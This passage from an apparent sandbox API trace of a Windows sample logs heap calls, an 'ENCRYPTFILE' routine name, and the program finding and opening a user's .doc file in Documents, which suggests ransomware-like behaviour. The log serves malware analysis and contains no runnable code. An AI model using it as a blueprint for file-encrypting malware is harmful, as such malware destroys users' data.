| out: hHeap=0x1780000) returned 1 [0076.615] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9950 | out: hHeap=0x1780000) returned 1 [0076.615] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9908 | out: hHeap=0x1780000) returned 1 [0076.615] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2230 | out: hHeap=0x1780000) returned 1 [0076.615] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf518 | out: hHeap=0x1780000) returned 1 [0076.615] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9938 | out: hHeap=0x1780000) returned 1 [0076.615] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e21d0 | out: hHeap=0x1780000) returned 1 [0076.615] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf388 | out: hHeap=0x1780000) returned 1 [0076.615] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x40a7cf8 | out: hHeap=0x1780000) returned 1 [0076.615] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2220 | out: hHeap=0x1780000) returned 1 [0076.615] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c98f0 | out: hHeap=0x1780000) returned 1 [0076.615] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9920 | out: hHeap=0x1780000) returned 1 [0076.615] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf810 | out: hHeap=0x1780000) returned 1 [0076.615] PeekMessageW (in: lpMsg=0x144f78c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f78c) returned 0 [0076.615] PeekMessageW (in: lpMsg=0x144f78c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f78c) returned 0 [0076.615] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2180 [0076.615] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf4a0 [0076.615] CharUpperBuffW (in: lpsz="ENCRYPTFILE", cchLength=0xb | out: lpsz="ENCRYPTFILE") returned 0xb [0076.616] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf4a0 | out: hHeap=0x1780000) returned 1 [0076.616] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2180 | out: hHeap=0x1780000) returned 1 [0076.616] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf518 [0076.616] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e2230 [0076.616] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf770 [0076.616] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c98f0 [0076.616] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e21a0 [0076.616] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9908 [0076.616] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e21d0 [0076.616] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1796ea8 [0076.616] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9920 [0076.616] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2220 [0076.616] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a8d08 [0076.616] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9920 | out: hHeap=0x1780000) returned 1 [0076.616] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e21e0 [0076.616] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e21e0 | out: hHeap=0x1780000) returned 1 [0076.616] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9920 [0076.616] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xb0) returned 0x42d9cd8 [0076.616] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a8d08 | out: hHeap=0x1780000) returned 1 [0076.616] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9920 | out: hHeap=0x1780000) returned 1 [0076.616] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796ea8 | out: hHeap=0x1780000) returned 1 [0076.616] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e21d0 | out: hHeap=0x1780000) returned 1 [0076.616] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e21a0 | out: hHeap=0x1780000) returned 1 [0076.616] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43c9920 [0076.616] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf428 [0076.617] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9938 [0076.617] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2270 [0076.617] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9950 [0076.617] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9e00 [0076.617] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a8b58 [0076.617] PeekMessageW (in: lpMsg=0x144f534, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f534) returned 0 [0076.617] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2240 [0076.617] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2130 [0076.617] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1797108 [0076.617] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1797108 | out: hHeap=0x1780000) returned 1 [0076.617] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2130 | out: hHeap=0x1780000) returned 1 [0076.617] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2240 | out: hHeap=0x1780000) returned 1 [0076.617] PeekMessageW (in: lpMsg=0x144f534, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f534) returned 0 [0076.617] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2320 [0076.617] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf810 [0076.617] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9d40 [0076.617] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e21d0 [0076.617] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9de8 [0076.617] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e21d0 | out: hHeap=0x1780000) returned 1 [0076.617] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Documents\\eJ Z0ZcCpMN.doc", lpFindFileData=0x144f078 | out: lpFindFileData=0x144f078*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xceb43d90, ftCreationTime.dwHighDateTime=0x1d5e94d, ftLastAccessTime.dwLowDateTime=0x547f2530, ftLastAccessTime.dwHighDateTime=0x1d5e1fa, ftLastWriteTime.dwLowDateTime=0x547f2530, ftLastWriteTime.dwHighDateTime=0x1d5e1fa, nFileSizeHigh=0x0, nFileSizeLow=0xd46d, dwReserved0=0x101adf4, dwReserved1=0x8, cFileName="eJ Z0ZcCpMN.doc", cAlternateFileName="EJZ0ZC~1.DOC")) returned 0x41ac2c0 [0076.617] FindClose (in: hFindFile=0x41ac2c0 | out: hFindFile=0x41ac2c0) returned 1 [0076.618] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9de8 | out: hHeap=0x1780000) returned 1 [0076.618] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9d40 | out: hHeap=0x1780000) returned 1 [0076.618] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf810 | out: hHeap=0x1780000) returned 1 [0076.618] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e22e0 [0076.618] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1797008 [0076.618] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2300 [0076.618] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x30) returned 0x4391f18 [0076.618] CharUpperBuffW (in: lpsz="_WINAPI_FILEINUSE", cchLength=0x11 | out: lpsz="_WINAPI_FILEINUSE") returned 0x11 [0076.618] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4391f18 | out: hHeap=0x1780000) returned 1 [0076.618] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2300 | out: hHeap=0x1780000) returned 1 [0076.618] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf4a0 [0076.618] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e2300 [0076.618] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf388 [0076.618] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9cf8 [0076.618] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2130 [0076.618] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9c68 [0076.618] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2130 | out: hHeap=0x1780000) returned 1 [0076.618] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43c9ba8 [0076.618] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf590 [0076.618] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9e30 [0076.618] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2130 [0076.618] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9e30 | out: hHeap=0x1780000) returned 1 [0076.618] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf5b8 [0076.619] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9e18 [0076.619] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9c50 [0076.619] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a8ac8 [0076.619] PeekMessageW (in: lpMsg=0x144f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f114) returned 0 [0076.619] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf810 [0076.619] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9bf0 [0076.619] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e21d0 [0076.619] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9c08 [0076.619] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9e60 [0076.619] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2140 [0076.619] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9e60 | out: hHeap=0x1780000) returned 1 [0076.619] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2150 [0076.619] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x30) returned 0x4391a10 [0076.619] CharUpperBuffW (in: lpsz="_WINAPI_CREATEFILEEX", cchLength=0x14 | out: lpsz="_WINAPI_CREATEFILEEX") returned 0x14 [0076.619] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4391a10 | out: hHeap=0x1780000) returned 1 [0076.619] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2150 | out: hHeap=0x1780000) returned 1 [0076.619] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf658 [0076.619] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e2150 [0076.619] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf838 [0076.619] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9c80 [0076.619] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2160 [0076.619] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9e78 [0076.619] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2160 | out: hHeap=0x1780000) returned 1 [0076.619] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e2160 [0076.619] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9d70 [0076.619] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e21e0 [0076.620] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e21e0 | out: hHeap=0x1780000) returned 1 [0076.620] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e2180 [0076.620] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9cb0 [0076.620] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2240 [0076.620] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2240 | out: hHeap=0x1780000) returned 1 [0076.620] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43c9d28 [0076.620] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf5e0 [0076.620] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9d40 [0076.620] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e21a0 [0076.620] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9d40 | out: hHeap=0x1780000) returned 1 [0076.620] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf608 [0076.620] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9d88 [0076.620] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9d40 [0076.620] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfce8 [0076.620] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9d58 [0076.620] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e21e0 [0076.620] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9d58 | out: hHeap=0x1780000) returned 1 [0076.620] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfa18 [0076.620] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9da0 [0076.620] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfa68 [0076.620] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9d58 [0076.620] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2200 [0076.620] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9dd0 [0076.620] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2240 [0076.621] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2240 | out: hHeap=0x1780000) returned 1 [0076.621] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf888 [0076.621] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9de8 [0076.621] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2240 [0076.621] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9e30 [0076.621] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2490 [0076.621] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2490 | out: hHeap=0x1780000) returned 1 [0076.621] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf8b0 [0076.621] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9e60 [0076.621] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2520 [0076.621] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9e60 | out: hHeap=0x1780000) returned 1 [0076.621] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x30) returned 0x4391f18 [0076.621] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9e60 [0076.621] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2490 [0076.621] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2490 | out: hHeap=0x1780000) returned 1 [0076.621] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfbf8 [0076.621] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca340 [0076.621] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2420 [0076.621] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca340 | out: hHeap=0x1780000) returned 1 [0076.621] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf950 [0076.621] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca280 [0076.621] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2380 [0076.621] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2380 | out: hHeap=0x1780000) returned 1 [0076.621] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfab8 [0076.621] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca418 [0076.622] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca418 | out: hHeap=0x1780000) returned 1 [0076.622] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca3d0 | out: hHeap=0x1780000) returned 1 [0076.622] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e24b0 | out: hHeap=0x1780000) returned 1 [0076.622] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e24a0 | out: hHeap=0x1780000) returned 1 [0076.622] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e23a0 | out: hHeap=0x1780000) returned 1 [0076.622] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e24a0 | out: hHeap=0x1780000) returned 1 [0076.622] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e23a0 | out: hHeap=0x1780000) returned 1 [0076.622] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e24b0 | out: hHeap=0x1780000) returned 1 [0076.622] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e23a0 | out: hHeap=0x1780000) returned 1 [0076.622] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e24a0 | out: hHeap=0x1780000) returned 1 [0076.622] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf9a0 | out: hHeap=0x1780000) returned 1 [0076.622] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e23a0 | out: hHeap=0x1780000) returned 1 [0076.622] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e24a0 | out: hHeap=0x1780000) returned 1 [0076.622] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e23a0 | out: hHeap=0x1780000) returned 1 [0076.622] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e24a0 | out: hHeap=0x1780000) returned 1 [0076.622] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e24a0 | out: hHeap=0x1780000) returned 1 [0076.622] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e24a0 | out: hHeap=0x1780000) returned 1 [0076.622] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e24a0 | out: hHeap=0x1780000) returned 1 [0076.622] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e24a0 | out: hHeap=0x1780000) returned 1 [0076.622] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a8de0 | out: hHeap=0x1780000) returned 1 [0076.623] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e24a0 | out: hHeap=0x1780000) returned 1 [0076.623] CharLowerBuffW (in: lpsz="handle", cchLength=0x6 | out: lpsz="handle") returned 0x6 [0076.623] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca718 | out: hHeap=0x1780000) returned 1 [0076.623] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e23d0 | out: hHeap=0x1780000) returned 1 [0076.623] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca730 | out: hHeap=0x1780000) returned 1 [0076.623] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e24a0 | out: hHeap=0x1780000) returned 1 [0076.623] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca598 | out: hHeap=0x1780000) returned 1 [0076.623] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e24a0 | out: hHeap=0x1780000) returned 1 [0076.623] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca5b0 | out: hHeap=0x1780000) returned 1 [0076.623] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e24b0 | out: hHeap=0x1780000) returned 1 [0076.623] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca550 | out: hHeap=0x1780000) returned 1 [0076.623] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e24b0 | out: hHeap=0x1780000) returned 1 [0076.623] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca568 | out: hHeap=0x1780000) returned 1 [0076.623] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25d0 | out: hHeap=0x1780000) returned 1 [0076.623] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca610 | out: hHeap=0x1780000) returned 1 [0076.623] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2670 | out: hHeap=0x1780000) returned 1 [0076.623] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca4d8 | out: hHeap=0x1780000) returned 1 [0076.623] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25f0 | out: hHeap=0x1780000) returned 1 [0076.623] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca5b0 | out: hHeap=0x1780000) returned 1 [0076.623] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2560 | out: hHeap=0x1780000) returned 1 [0076.623] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca658 | out: hHeap=0x1780000) returned 1 [0076.623] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2700 | out: hHeap=0x1780000) returned 1 [0076.623] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca760 | out: hHeap=0x1780000) returned 1 [0076.623] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25a0 | out: hHeap=0x1780000) returned 1 [0076.623] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca5c8 | out: hHeap=0x1780000) returned 1 [0076.623] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2640 | out: hHeap=0x1780000) returned 1 [0076.624] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca598 | out: hHeap=0x1780000) returned 1 [0076.624] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26a0 | out: hHeap=0x1780000) returned 1 [0076.624] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca5b0 | out: hHeap=0x1780000) returned 1 [0076.624] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2600 | out: hHeap=0x1780000) returned 1 [0076.624] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca640 | out: hHeap=0x1780000) returned 1 [0076.624] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2700 | out: hHeap=0x1780000) returned 1 [0076.624] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca508 | out: hHeap=0x1780000) returned 1 [0076.624] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25b0 | out: hHeap=0x1780000) returned 1 [0076.624] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x772d0000 [0076.626] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFileW", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0076.626] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFileW", cchWideChar=12, lpMultiByteStr=0x43ca490, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CreateFileW", lpUsedDefaultChar=0x0) returned 12 [0076.626] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca490 | out: hHeap=0x1780000) returned 1 [0076.627] GetProcAddress (hModule=0x772d0000, lpProcName="CreateFileW") returned 0x7733ed10 [0076.627] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca688 | out: hHeap=0x1780000) returned 1 [0076.627] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2640 | out: hHeap=0x1780000) returned 1 [0076.627] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26e0 | out: hHeap=0x1780000) returned 1 [0076.627] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25f0 | out: hHeap=0x1780000) returned 1 [0076.627] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2560 | out: hHeap=0x1780000) returned 1 [0076.627] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2530 | out: hHeap=0x1780000) returned 1 [0076.627] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2540 | out: hHeap=0x1780000) returned 1 [0076.627] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2690 | out: hHeap=0x1780000) returned 1 [0076.627] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2680 | out: hHeap=0x1780000) returned 1 [0076.627] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf900 | out: hHeap=0x1780000) returned 1 [0076.627] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Documents\\eJ Z0ZcCpMN.doc" (normalized: "c:\\users\\fd1hvy\\documents\\ej z0zccpmn.doc"), dwDesiredAccess=0x80000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x298 [0076.627] HeapFree (in: 